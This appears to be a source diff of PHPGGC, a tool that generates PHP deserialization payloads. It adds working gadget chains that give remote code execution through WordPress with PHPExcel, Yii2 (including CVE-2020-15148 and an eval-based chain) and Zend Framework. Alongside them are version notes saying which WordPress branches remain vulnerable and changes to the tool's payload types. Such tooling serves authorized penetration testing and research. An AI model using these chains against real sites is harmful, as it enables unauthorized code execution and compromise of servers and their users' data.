6 | { | |
7 | private $_handles; | |
8 | ||
9 | // Custom constructor to set the $handles more easily | |
10 | public function __construct($handles) | |
11 | { | |
12 | $this->_handles = $handles; | |
13 | } | |
14 | } |
1 | 1 | |
2 | 2 | namespace GadgetChain\WordPress\P\YetAnotherStarsRating; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '? <= 1.8.6'; | |
6 | public static $version = '? <= 1.8.6 & WP < 5.5.2'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'erwan_lr'; |
9 | public static $informations = 'Paylaod has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings'; | |
9 | public static $information = 'Payload has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.8.2+ & WP < 5.5.2'; | |
7 | public static $vector = '__toString'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_RichText( | |
17 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
18 | ); | |
19 | } | |
20 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '<= 1.8.1 & WP < 5.5.2'; | |
7 | public static $vector = '__toString'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_RichText( | |
17 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
18 | ); | |
19 | } | |
20 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $_richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->_richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->_richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.8.2+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_CachedObjectStorage_DiscISAM( | |
17 | new \PHPExcel_RichText( | |
18 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
19 | ) | |
20 | ); | |
21 | } | |
22 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | } | |
31 | ||
32 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php | |
33 | class PHPExcel_CachedObjectStorage_DiscISAM { | |
34 | private $fileName = null; | |
35 | private $fileHandle = 42; | |
36 | ||
37 | public function __construct($filePath) { | |
38 | $this->fileName = $filePath; | |
39 | } | |
40 | ||
41 | /* | |
42 | public function __destruct() { | |
43 | if (!is_null($this->fileHandle)) { | |
44 | fclose($this->fileHandle); // Will only produce a warning | |
45 | unlink($this->fileName); // Passing an object will call its __toString(), triggering the RCE | |
46 | } | |
47 | $this->fileHandle = null; | |
48 | } | |
49 | */ | |
50 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '<= 1.8.1 & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_CachedObjectStorage_DiscISAM( | |
17 | new \PHPExcel_RichText( | |
18 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
19 | ) | |
20 | ); | |
21 | } | |
22 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $_richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->_richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->_richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | } | |
31 | ||
32 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php | |
33 | class PHPExcel_CachedObjectStorage_DiscISAM { | |
34 | private $_fileName = null; | |
35 | private $_fileHandle = 42; | |
36 | ||
37 | public function __construct($filePath) { | |
38 | $this->_fileName = $filePath; | |
39 | } | |
40 | ||
41 | /* | |
42 | public function __destruct() { | |
43 | if (!is_null($this->_fileHandle)) { | |
44 | fclose($this->_fileHandle); // Will only produce a warning | |
45 | unlink($this->_fileName); // Passing an object will call its __toString(), triggering the RCE | |
46 | } | |
47 | $this->fileHandle = null; | |
48 | } | |
49 | */ | |
50 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.8.2+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_Shared_XMLWriter( | |
17 | new \PHPExcel_RichText( | |
18 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
19 | ) | |
20 | ); | |
21 | } | |
22 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | } | |
31 | ||
32 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php | |
33 | class PHPExcel_Shared_XMLWriter { | |
34 | private $tempFileName = ''; | |
35 | ||
36 | public function __construct($filePath) { | |
37 | $this->tempFileName = $filePath; | |
38 | } | |
39 | ||
40 | /* | |
41 | public function __destruct() | |
42 | { | |
43 | // Unlink temporary files | |
44 | if ($this->tempFileName != '') { | |
45 | @unlink($this->tempFileName); // Passing an object will call its __toString(), triggering the RCE | |
46 | } | |
47 | } | |
48 | */ | |
49 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\PHPExcel; | |
3 | ||
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '<= 1.8.1 & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \PHPExcel_Shared_XMLWriter( | |
17 | new \PHPExcel_RichText( | |
18 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
19 | ) | |
20 | ); | |
21 | } | |
22 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php | |
5 | class PHPExcel_RichText { | |
6 | private $_richTextElements; | |
7 | ||
8 | public function __construct($richTextElements) { | |
9 | $this->_richTextElements = $richTextElements; | |
10 | } | |
11 | ||
12 | /* | |
13 | public function getPlainText() { | |
14 | // Return value | |
15 | $returnValue = ''; | |
16 | ||
17 | // Loop through all PHPExcel_RichText_ITextElement | |
18 | foreach ($this->_richTextElements as $text) { | |
19 | $returnValue .= $text->getText(); | |
20 | } | |
21 | ||
22 | // Return | |
23 | return $returnValue; | |
24 | } | |
25 | ||
26 | public function __toString() { | |
27 | return $this->getPlainText(); | |
28 | } | |
29 | */ | |
30 | } | |
31 | ||
32 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php | |
33 | class PHPExcel_Shared_XMLWriter { | |
34 | private $_tempFileName = ''; | |
35 | ||
36 | public function __construct($filePath) { | |
37 | $this->_tempFileName = $filePath; | |
38 | } | |
39 | ||
40 | /* | |
41 | public function __destruct() | |
42 | { | |
43 | // Unlink temporary files | |
44 | if ($this->_tempFileName != '') { | |
45 | @unlink($this->_tempFileName); // Passing an object will call its __toString(), triggering the RCE | |
46 | } | |
47 | } | |
48 | */ | |
49 | }⏎ |
11 | 11 | [2] https://github.com/WordPress/WordPress/blob/643ec358a40faba739266f11c34990c142f02d98/wp-includes/functions.php#L1057 |
12 | 12 | */ |
13 | 13 | |
14 | // WordPress - https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php | |
14 | /* | |
15 | * Issue was introduced in 4.6 via "HTTP API: Replace internals with Requests library" | |
16 | * See https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php | |
17 | * | |
18 | * On October 29th, 2020, WP 5.5.2 was relased, fixing the issue: https://www.wordfence.com/blog/2020/11/unpacking-the-wordpress-5-5-2-5-5-3-security-release/ | |
19 | * | |
20 | * More details: | |
21 | * Versions in 5.x branches have been fixed, at the exception of 5.0.x | |
22 | * 4.x from 4.6 are still vulnerable. | |
23 | * | |
24 | * 5.5.x, fixed in 5.5.2 | |
25 | * 5.4.x, fixed in 5.4.3 | |
26 | * 5.3.x, fixed in 5.3.5 | |
27 | * 5.2.x, fixed in 5.2.8 | |
28 | * 5.1.x, fixed in 5.1.7 | |
29 | * 5.0.x still vulnerable (latest checked 5.0.11) | |
30 | * 4.9.x still vulnerable (latest checked 4.9.16) | |
31 | * 4.8.x still vulnerable (latest checked 4.8.15) | |
32 | * 4.7.x still vulnerable (latest checked 4.7.19) | |
33 | * 4.6.x still vulnerable (latest checked 4.6.20) | |
34 | */ | |
15 | 35 | class Requests_Utility_FilteredIterator extends ArrayIterator { |
16 | 36 | protected $callback; |
17 | 37 |
1 | 1 | |
2 | 2 | namespace GadgetChain\Yii; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '1.1.20'; |
7 | 7 | public static $vector = '__wakeup'; |
8 | 8 | public static $author = 'cf'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | As the payload uses file_get_contents("data://..."), allow_url_fopen |
11 | 11 | must be ON. |
12 | 12 | '; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Yii2; | |
3 | ||
4 | ||
5 | // CVE-2020-15148 | |
6 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
7 | { | |
8 | public static $version = '<2.0.38'; | |
9 | public static $vector = '__destruct'; | |
10 | public static $author = 'russtone'; | |
11 | public static $information = 'Executes $function with $parameter using call_user_func.'; | |
12 | ||
13 | public function generate(array $parameters) | |
14 | { | |
15 | $function = $parameters['function']; | |
16 | $parameter = $parameters['parameter']; | |
17 | ||
18 | $cache = new \yii\caching\ArrayCache($function, $parameter); | |
19 | $csb = new \yii\db\ColumnSchemaBuilder($cache); | |
20 | $conn = new \yii\db\Connection($csb); | |
21 | $query = new \yii\db\BatchQueryResult($conn); | |
22 | ||
23 | return $query; | |
24 | } | |
25 | } |
0 | <?php | |
1 | ||
2 | namespace yii\db { | |
3 | class ColumnSchemaBuilder { | |
4 | protected $type = 'x'; | |
5 | public $categoryMap; | |
6 | ||
7 | function __construct($categoryMap) { | |
8 | $this->categoryMap = $categoryMap; | |
9 | } | |
10 | } | |
11 | ||
12 | class Connection { | |
13 | public $pdo = 1; | |
14 | ||
15 | function __construct($dsn) { | |
16 | $this->dsn = $dsn; | |
17 | } | |
18 | } | |
19 | ||
20 | class BatchQueryResult { | |
21 | private $_dataReader; | |
22 | ||
23 | function __construct($dataReader) { | |
24 | $this->_dataReader = $dataReader; | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace yii\caching { | |
30 | class ArrayCache { | |
31 | public $serializer; | |
32 | private $_cache; | |
33 | ||
34 | function __construct($function, $parameter) { | |
35 | $this->serializer = [1 => $function]; | |
36 | $this->_cache = ['x' => [$parameter, 0]]; | |
37 | } | |
38 | } | |
39 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Yii2; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | { | |
6 | public static $version = '<2.0.38'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'RedTeam Pentesting GmbH'; | |
9 | public static $information = 'Executes given PHP code through eval().'; | |
10 | public static $parameters = [ | |
11 | 'code' | |
12 | ]; | |
13 | ||
14 | public function generate(array $parameters) | |
15 | { | |
16 | $code = $parameters['code']; | |
17 | ||
18 | $expression = new \yii\caching\ExpressionDependency($code); | |
19 | $callback = array($expression, 'evaluateDependency'); | |
20 | $dbsession = new \yii\web\DbSession($callback); | |
21 | $query = new \yii\db\BatchQueryResult($dbsession); | |
22 | ||
23 | return $query; | |
24 | } | |
25 | } | |
26 |
0 | <?php | |
1 | namespace yii\web | |
2 | { | |
3 | class DbSession | |
4 | { | |
5 | public $writeCallback; | |
6 | ||
7 | function __construct($writeCallback) { | |
8 | $this->writeCallback = $writeCallback; | |
9 | } | |
10 | } | |
11 | } | |
12 | ||
13 | namespace yii\caching | |
14 | { | |
15 | class ExpressionDependency | |
16 | { | |
17 | public $expression; | |
18 | ||
19 | function __construct($expression) { | |
20 | $this->expression = $expression; | |
21 | } | |
22 | } | |
23 | } | |
24 | ||
25 | namespace yii\db { | |
26 | class BatchQueryResult { | |
27 | private $_dataReader; | |
28 | ||
29 | function __construct($dataReader) { | |
30 | $this->_dataReader = $dataReader; | |
31 | } | |
32 | } | |
33 | } | |
34 | ||
35 | ?> |
3 | 3 | |
4 | 4 | // Original author: Stefan Esser (2010) |
5 | 5 | // https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf |
6 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
6 | class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
7 | 7 | { |
8 | 8 | public static $version = '? <= 1.12.20'; |
9 | 9 | public static $vector = '__destruct'; |
10 | 10 | public static $author = 'mpchadwick'; # GC Implementation |
11 | public static $informations = ' | |
11 | public static $information = ' | |
12 | 12 | - Uses preg_replace e modifier which has no effect in PHP >= 7.0.0 |
13 | 13 | - Payload gets executed twice |
14 | 14 | '; |
15 | public static $parameters = [ | |
16 | 'code' | |
17 | ]; | |
18 | 15 | |
19 | 16 | public function generate(array $parameters) |
20 | 17 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\ZendFramework; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '1.11.12 <= 1.12.20'; |
7 | 7 | public static $vector = '__toString'; |
8 | 8 | public static $author = 'cf'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Uses zf1/zend-form, which requires zf1/zend-cache. |
11 | 11 | '; |
12 | 12 |
1 | 1 | |
2 | 2 | namespace GadgetChain\ZendFramework; |
3 | 3 | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '2.0.1 <= ?'; |
7 | 7 | public static $vector = '__destruct'; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\ZendFramework; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | { | |
6 | public static $version = '? <= 1.12.20'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'ydyachenko'; | |
9 | ||
10 | public static $information = ' | |
11 | - Based on ZendFramework/RCE1 | |
12 | - Works on PHP >= 7.0.0 | |
13 | '; | |
14 | ||
15 | public function generate(array $parameters) | |
16 | { | |
17 | return new \Zend_Log( | |
18 | [new \Zend_Log_Writer_Mail( | |
19 | [1], | |
20 | [], | |
21 | new \Zend_Mail, | |
22 | new \Zend_Layout( | |
23 | new \Zend_Filter_Inflector(), | |
24 | true, | |
25 | $parameters['code'] | |
26 | ) | |
27 | )] | |
28 | ); | |
29 | } | |
30 | }⏎ |
0 | <?php | |
1 | ||
2 | class Zend_Log | |
3 | { | |
4 | protected $_writers; | |
5 | ||
6 | function __construct($x) | |
7 | { | |
8 | $this->_writers = $x; | |
9 | } | |
10 | } | |
11 | ||
12 | class Zend_Log_Writer_Mail | |
13 | { | |
14 | protected $_eventsToMail; | |
15 | protected $_layoutEventsToMail; | |
16 | protected $_mail; | |
17 | protected $_layout; | |
18 | protected $_subjectPrependText; | |
19 | ||
20 | public function __construct( | |
21 | $eventsToMail, | |
22 | $layoutEventsToMail, | |
23 | $mail, | |
24 | $layout | |
25 | ) { | |
26 | $this->_eventsToMail = $eventsToMail; | |
27 | $this->_layoutEventsToMail = $layoutEventsToMail; | |
28 | $this->_mail = $mail; | |
29 | $this->_layout = $layout; | |
30 | $this->_subjectPrependText = null; | |
31 | } | |
32 | } | |
33 | ||
34 | class Zend_Mail | |
35 | { | |
36 | } | |
37 | ||
38 | class Zend_Layout | |
39 | { | |
40 | protected $_inflector; | |
41 | protected $_inflectorEnabled; | |
42 | protected $_layout; | |
43 | ||
44 | public function __construct( | |
45 | $inflector, | |
46 | $inflectorEnabled, | |
47 | $layout | |
48 | ) { | |
49 | $this->_inflector = $inflector; | |
50 | $this->_inflectorEnabled = $inflectorEnabled; | |
51 | $this->_layout = '){}' . $layout . '/*'; | |
52 | } | |
53 | } | |
54 | ||
55 | class Zend_Filter_Callback | |
56 | { | |
57 | protected $_callback = "create_function"; | |
58 | protected $_options = [""]; | |
59 | } | |
60 | ||
61 | class Zend_Filter_Inflector | |
62 | { | |
63 | protected $_rules = []; | |
64 | ||
65 | public function __construct() | |
66 | { | |
67 | $this->_rules['script'] = [new Zend_Filter_Callback()]; | |
68 | } | |
69 | }⏎ |
45 | 45 | $clean_string = ''; |
46 | 46 | for($i=0; $i < strlen($string); $i++) |
47 | 47 | { |
48 | $letter = $string{$i}; | |
48 | $letter = $string[$i]; | |
49 | 49 | $clean_string .= ctype_print($letter) && $letter != '\\' ? |
50 | 50 | $letter : |
51 | 51 | sprintf("\\%02x", ord($letter)); |
8 | 8 | * With 's': |
9 | 9 | * O:3:"Abc":1:{s:1:"x";i:3;} -> O:3:"Abc":1:{s:+1:"x";i:3;} |
10 | 10 | * |
11 | * Note: Since PHP 7.2, only i and d (float) types can have a +. | |
11 | * Note: Since PHP 7.2, only i and d (float) types can be prefixed by | |
12 | * a plus sign. | |
12 | 13 | */ |
13 | 14 | class PlusNumbers extends Enhancement |
14 | 15 | { |
0 | <?php | |
1 | ||
2 | namespace PHPGGC\GadgetChain\RCE; | |
3 | ||
4 | /** | |
5 | * Class Command | |
6 | * Executes a command (bash/batch). | |
7 | * @package PHPGGC\GadgetChain\RCE | |
8 | */ | |
9 | abstract class Command extends \PHPGGC\GadgetChain\RCE | |
10 | { | |
11 | public static $type = self::TYPE_RCE_COMMAND; | |
12 | public static $parameters = [ | |
13 | 'command' | |
14 | ]; | |
15 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace PHPGGC\GadgetChain\RCE; | |
3 | ||
4 | /** | |
5 | * Class FunctionCall | |
6 | * Executes a PHP function with one argument. | |
7 | * @package PHPGGC\GadgetChain\RCE | |
8 | */ | |
9 | abstract class FunctionCall extends \PHPGGC\GadgetChain\RCE | |
10 | { | |
11 | public static $type = self::TYPE_RCE_FUNCTIONCALL; | |
12 | public static $parameters = [ | |
13 | 'function', | |
14 | 'parameter' | |
15 | ]; | |
16 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace PHPGGC\GadgetChain\RCE; | |
3 | ||
4 | /** | |
5 | * Class PHPCode | |
6 | * Executes PHP code. | |
7 | * @package PHPGGC\GadgetChain\RCE | |
8 | */ | |
9 | abstract class PHPCode extends \PHPGGC\GadgetChain\RCE | |
10 | { | |
11 | public static $type = self::TYPE_RCE_PHPCODE; | |
12 | public static $parameters = [ | |
13 | 'code' | |
14 | ]; | |
15 | }⏎ |
4 | 4 | abstract class RCE extends \PHPGGC\GadgetChain |
5 | 5 | { |
6 | 6 | public static $type = self::TYPE_RCE; |
7 | public static $parameters = [ | |
8 | 'function', | |
9 | 'parameter' | |
10 | ]; | |
7 | # TBD by subclasses | |
8 | public static $parameters = []; | |
11 | 9 | }⏎ |
0 | <?php | |
1 | namespace PHPGGC\GadgetChain; | |
2 | ||
3 | abstract class SSRF extends \PHPGGC\GadgetChain | |
4 | { | |
5 | public static $type = self::TYPE_SSRF; | |
6 | public static $parameters = [ | |
7 | 'uri' | |
8 | ]; | |
9 | } | |
10 | ?> |
37 | 37 | public static $vector = ''; |
38 | 38 | public static $author = ''; |
39 | 39 | public static $parameters = []; |
40 | public static $informations; | |
40 | public static $information; | |
41 | 41 | |
42 | 42 | # Types |
43 | const TYPE_RCE = 'rce'; | |
44 | const TYPE_FI = 'file_include'; | |
45 | const TYPE_FR = 'file_read'; | |
46 | const TYPE_FW = 'file_write'; | |
47 | const TYPE_FD = 'file_delete'; | |
48 | const TYPE_SQLI = 'sql_injection'; | |
43 | const TYPE_RCE = 'RCE'; | |
44 | const TYPE_RCE_FUNCTIONCALL = 'RCE (Function call)'; | |
45 | const TYPE_RCE_PHPCODE = 'RCE (PHP code)'; | |
46 | const TYPE_RCE_COMMAND = 'RCE (Command)'; | |
47 | const TYPE_CMD = 'CMD'; | |
48 | const TYPE_SSRF = 'SSRF'; | |
49 | const TYPE_FR = 'File read'; | |
50 | const TYPE_FW = 'File write'; | |
51 | const TYPE_FD = 'File delete'; | |
52 | const TYPE_SQLI = 'SQL injection'; | |
49 | 53 | const TYPE_INFO = 'phpinfo()'; |
50 | 54 | |
51 | 55 | function __construct() |
125 | 129 | |
126 | 130 | $strings = []; |
127 | 131 | |
128 | if(static::$informations) | |
132 | if(static::$information) | |
129 | 133 | { |
130 | $informations = trim(static::$informations); | |
131 | $informations = preg_replace("#\n\s+#", "\n", $informations); | |
132 | $infos['Informations'] = "\n" . $informations; | |
134 | $information = trim(static::$information); | |
135 | $information = preg_replace("#\n\s+#", "\n", $information); | |
136 | $infos['Informations'] = "\n" . $information; | |
133 | 137 | } |
134 | 138 | |
135 | 139 | foreach($infos as $k => $v) |
450 | 450 | /** |
451 | 451 | * Displays a list of gadget chains. |
452 | 452 | */ |
453 | protected function list_gc() | |
453 | protected function list_gc($filter) | |
454 | 454 | { |
455 | 455 | $this->o(""); |
456 | 456 | $this->o("Gadget Chains"); |
467 | 467 | $data = []; |
468 | 468 | foreach($this->chains as $chain) |
469 | 469 | { |
470 | if($filter && stripos($chain::get_name(), $filter) === false) | |
471 | continue; | |
470 | 472 | $data[] = [ |
471 | 473 | $chain::get_name(), |
472 | 474 | $chain::$version, |
473 | 475 | $chain::$type, |
474 | 476 | $chain::$vector, |
475 | ($chain::$informations ? '*' : '') | |
477 | ($chain::$information ? '*' : '') | |
476 | 478 | ]; |
477 | 479 | } |
478 | 480 | |
499 | 501 | |
500 | 502 | $this->o('INFORMATION'); |
501 | 503 | $this->o(' -h, --help Displays help'); |
502 | $this->o(' -l, --list Lists available gadget chains'); | |
503 | $this->o(' -i, --informations'); | |
504 | $this->o(' Displays informations about a gadget chain'); | |
504 | $this->o(' -l, --list [filter] Lists available gadget chains'); | |
505 | $this->o(' -i, --information'); | |
506 | $this->o(' Displays information about a gadget chain'); | |
505 | 507 | $this->o(''); |
506 | 508 | $this->o('OUTPUT'); |
507 | 509 | $this->o(' -o, --output <file>'); |
554 | 556 | $this->o(' --test-payload'); |
555 | 557 | $this->o(' Instead of displaying or storing the payload, includes vendor/autoload.php and unserializes the payload.'); |
556 | 558 | $this->o(' The test script can only deserialize __destruct, __wakeup, __toString and PHAR payloads.'); |
557 | $this->o(' Warning: This will run your payload on YOUR system !'); | |
559 | $this->o(' Warning: This will run the payload on YOUR system !'); | |
558 | 560 | $this->o(''); |
559 | 561 | |
560 | 562 | $this->o('EXAMPLES'); |
563 | $this->o(' ' . $this->_get_command_line( | |
564 | '-l' | |
565 | )); | |
566 | $this->o(' ' . $this->_get_command_line( | |
567 | '-l drupal' | |
568 | )); | |
561 | 569 | $this->o(' ' . $this->_get_command_line( |
562 | 570 | 'Laravel/RCE1', |
563 | 571 | 'system', |
614 | 622 | |
615 | 623 | foreach($valid_arguments as $k => $v) |
616 | 624 | { |
617 | $abbreviations[$k] = $k{0}; | |
